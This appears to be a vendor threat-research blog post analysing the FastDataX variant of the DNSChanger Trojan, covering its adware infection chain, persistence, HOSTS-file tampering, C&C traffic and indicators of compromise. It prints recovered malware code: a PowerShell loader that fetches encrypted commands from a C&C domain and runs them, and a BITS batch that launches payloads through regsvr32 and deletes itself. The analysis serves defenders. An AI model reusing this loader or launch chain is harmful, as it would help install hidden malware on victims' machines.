Watch Out: The FastDataX campaign – DNSChanger is Back!

Watch Out: The FastDataX campaign – DNSChanger is Back!

Verint’s Cyber Research team has recently discovered evidence of a new campaign for a variant of the infamous DNSChanger Trojan, which, as its name implies, alters a computer’s DNS entries to point toward rogue name servers. The new Trojan was identified through alerts in a Verint Threat Protection System (TPS) installation, which were triggered by its behavioral C&C detection engine. The alerts triggered an automatic investigation in TPS, which identified other suspicious domains and combined all related alerts into one security incident.

Using forensic tools, Verint’s Cyber Research determined that this DNSChanger campaign utilizes familiar characteristics and patterns, such as PowerShell scripts, BITS Jobs and communication patterns used in previous campaigns. Click To TweetFurther analysis uncovered the initial infection point, related payloads and additional domains and concluded they are all part of the new campaign. Interestingly, the campaign makes use of new domains that were registered on March 2017 and are yet to be linked to DNSChanger.

Previous DNSChanger campaigns have been tightly connected with Adware and PUAs as a source of (re)-infection. The campaign utilizes a file named “fastdatax.exe” and initial analysis suggests this may be the DNSChanger. This file creates the BITS tasks, which make the DNSChanger network connections to download and execute payloads (see below).

We named the current campaign “FastDataX” since it revolves around a software with this name and communicates with FastDataX[dictionary word].info web sites.

The following Blog is a detailed account of the Verint research team’s findings and includes:

  • Initial detection of the malware via behavioral C&C alerts
  • Forensic analysis of infection point
  • Persistence methods
  • Related network traffic analysis
  • List of IOCs


The Verint Threat Protection System (TPS) issued several behavioral C&C alerts pertaining to several fastdatax*.info domains and started an automatic investigation:

Verint Threat Protection System – C&C (Behavioral Analysis) Alert

Verint Threat Protection System – Link Analysis



Forensic analysis of the alerted endpoint revealed the following scenario: A user voluntarily downloaded a malicious file from some file-sharing website, after the user double-clicked the file, an .xht file (XHTML, an HTML file which is defined as an XML application) was dropped and executed.

The .xht file included a link to


Also, displayed several images hosted by, which are instructions on how to save and execute the downloaded software:

Instructions on how to save and execute the downloaded software:


The execution of the file also triggered a chain of events which lead to the installation of several software bundles which can be categorized as PUP/Adware. Among those were YeaDesktop, PCCleanPlus, X-Madbench and FastDataX. Out of these adware, FastDataX was looking most curious and insidious

As with previous campaigns (which abused applications like Optimizer Pro and System Healer), these Adware are the second stage of infection for DNSChanger.


Several persistence mechanisms were utilized by the installed PUP/Adware:

  • Registry ‘run’ key – abused by such Adware as YeaDesktop
  • Scheduled tasks with the application name, abused by Adware like ‘Pangody’ & X- Madbench. For example and scheduled task named “X-Madbench”, which executes rundll32 “C:\Program Files\X-Madbench\X-Madbench.dll”,SceNcISYvR 
  • Scheduled tasks with random names and GUID that execute DLLs via rundll32. For example, scheduled task named “E3605470-291B-44EB-8648-745EE356599A”
  • Scheduled tasks with random names that executes PowerShell (see more details below)
  • BITS jobs (see more details below)


FastDataX.exe maintains persistence via a scheduled task named “FastDataX”, and an additional scheduled task is created in a GUID structure (7D0A0D47-057F-040C-7E11-7E0D7905117D). This task is comprised of the following PowerShell :

registry update – position windows out of bounds of screen
function RegistryUpdate($p){
New-Item -Path $p|Out-Null;
New-ItemProperty -Path $p -Name $n -PropertyType DWORD -Value 201329664|
Set-ItemProperty -Path $p -Name $n -Value 201329664|Out-Null;
/* this is the URL with the GET params */
$surl=”http[://]fastdataxster[.]info/u/?a=2tpeW5PNy/** snipped by VERINT to
protect customer privacy */”;
/* end of url with params */
/* check for PS version – if 1 exit) */
if($PSVersionTable.PSVersion.Major -lt 2){
/* checks if Windows env is early then 8, exit if it is */
if($v.Major -eq 5){
if(($v.Minor -lt 2) -AND ((Get-WmiObject Win32_OperatingSystem).
ServicePackMajorVersion -lt 2)){
/* checking for permissioned user – if not administrator – exit */
if(-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]
::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] “Administrator”)){
* GET Request, download further instructions, using a “legit” UA (not really)
function downloadCmd($url){
$rq=New-Object System.Net.WebClient;
$rq.Headers.Add(“user-agent” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;)”);
return [System.Text.Encoding]::ASCII.GetString($rq.DownloadData($url));
* Decryption scheme (second byte in stream used as XOR + Offest, then AND 0xFF
function decryptCmd($rawdata){
$key=$bt[1] -bxor 170;
$i -lt $bt.Length;
$bt[$i]=($bt[$i] -bxor (($key + $i) -band 255));
return(New-Object IO.StreamReader(New-Object IO.Compression.DeflateStream(
(New-Object IO.MemoryStream($bt 2 ($bt.Length-$ext))) [IO.Compression.CompressionMode]
Invoke-Expression -command “$sc”;
exit 0;

This PS script combines an outgoing GET message to fastdataxster[.]info and a decrypted body. The decrypted response holds execution data and thus can expand the malware’s abilities upon will.

The structure of this PowerShell is similar to a previously analyzed DNSChanger PS script. It should be noted that the domain embedded inside the script is new and was not previously linked to the DNSChanger campaign.

BITS job:

FastdataX also uses BITS (Background Intelligent Transfer Service) jobs which generate HTTP Head messages to fastdataxcast[.]info and fastdataxfire[.]info. We could not find online information regarding these domains or any association between them and the current malware campaign.

That being said, the two types of BITS job are identical to previously analyzed BITS jobs.

The following BITS job is an example of a task recovered from the BITS logs of the infected endpoint and it is used in order to download, install and perform clean-up of the malware payloads.

BITS job to create batch

"cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\4806190a-7c75-
1\x.bat" & 
echo bitsadmin /complete 4806190a-7c75-1 ^> nul >> "C:\ProgramData\4806190a-7c75-
1\x.bat" & 
echo bitsadmin /cancel 4806190a-7c75-1 ^> nul >> "C:\ProgramData\4806190a-7c75-
1\x.bat" & 
echo if exist "C:\ProgramData\4806190a-7c75-1\4806190a-7c75-1.d" goto q >> 
"C:\ProgramData\4806190a-7c75-1\x.bat" & 
for /f %i in ('dir /a:-d /b /w "C:\ProgramData\4806190a-7c75-1\*.tmp"') do (echo start
/b /min regsvr32.exe /s /n /i:"!=477863894806190a" "C:\ProgramData\4806190a-7c75-1\%i"
>> "C:\ProgramData\4806190a-7c75-1\x.bat")) > nul & 
echo :q >> "C:\ProgramData\4806190a-7c75-1\x.bat" & 
echo start /b /min regsvr32.exe /s /n /i:"!=477863894806190a" "C:\ProgramData\4806190a-7c75-
1\4806190a-7c75-1 d" >> "C:\ProgramData\4806190a-7c75-1\x.bat" & 
echo del "C:\ProgramData\4806190a-7c75-1\x.bat" ^& exit >> "C:\ProgramData\4806190a-
7c75-1\x.bat" & 

Changes to the DNS settings

DNSChanger has been using one of three methods in order to change the DNS settings:

  • Modifying the ‘NameServer’ & ‘DHCPNameServer’ settings in the Windows registry, thus replacing the configured servers with new DNS servers (by calling the DhcpNotifyConfigChange (API)
  • Changing the router’s DNS configuration (as analysed by Proofpoint)
  • Editing the local HOSTS file

The ‘FastDatax’ variant of DNSChanger is using the third method. It adds multiple domains (see list in the IOC section of this article) that are used to download additional payloads


An analysis with Verint’s TPS Network Forensics component, which enables a detailed network analysis, revealed evidence of the malware’s C&C communication:

An analysis with Verint's TPS Network Forensics component which enables to perform a detailed network analysis, revealed evidence of the malware's C&C communication:
This enabled the Cyber research team to distinguish between three types of sessions with similar structures:

1. HEAD request sessions to “fastdataxfier[.]info” and “fastdataxcast[.]info”. As discussed above, these are generated by FastDataX BITS jobs:

2. GET request sessions to “fastdataxster[.]info” that were generated by the above mentioned PowerShell script:

3. POST request sessions to “fastdataxient[.]info“, “fastdataxium[.]info” and “fastdataxify[.]info

It should be noted that all the FastDataX domains were resulted to the IP address, which was used in previous DNSChanger campaign.

As can be seen from the above images, the user agents used by the malware are different from each other and are spoofed. Noticeable example for that is a “bug” in generating a user-agent, where the word “user agent” appears twice:

It has a similar traffic structure that was observed in the past and referred to DNSChanger, where parameters contained system information and DNS configuration information.

Below is a list of identified IOCs relating to the FastDataX campaign.



Seen on 21-22.06.2017 in Verint TPS

Related domains:

Domain Passive DNS replication date 2017-07-07 2017-07-06 2017-07-05 2017-07-05 2017-06-30 2017-06-27 2017-06-27 2017-06-27 2017-06-27 2017-06-27 2017-06-27 2017-06-27 2017-06-27 2017-06-27 2017-06-27 2017-06-27 2017-06-25 2017-06-21 2017-06-21 2017-06-21 2017-06-21 2017-06-21 2017-06-08

Domains found inside the HOSTS file



MD5 SHA256 Description
fdfebd2ba002b18eac079a1ac21ef70d 16ea0a1c090e8084cbee7d5b9eb55d07d7db09eb58ee93fe096c9b624d9dae64 Payload downloader (.xht)
a11e1be8f9418f4e075b4c9794bc75f8 a779534bd4110602ef630a0afe8031f931d7fa4f7ef84b3e449d915a60d1b0ea Pangody.dll
8c03a0be7aadec4506fc52c4a507e320 f1eda24967aafc09d82418d8e92a189221bdfe52befa7cbbdb6d8642a8ffd5b8 X-Madbench.dll

Author: Verint Research Lab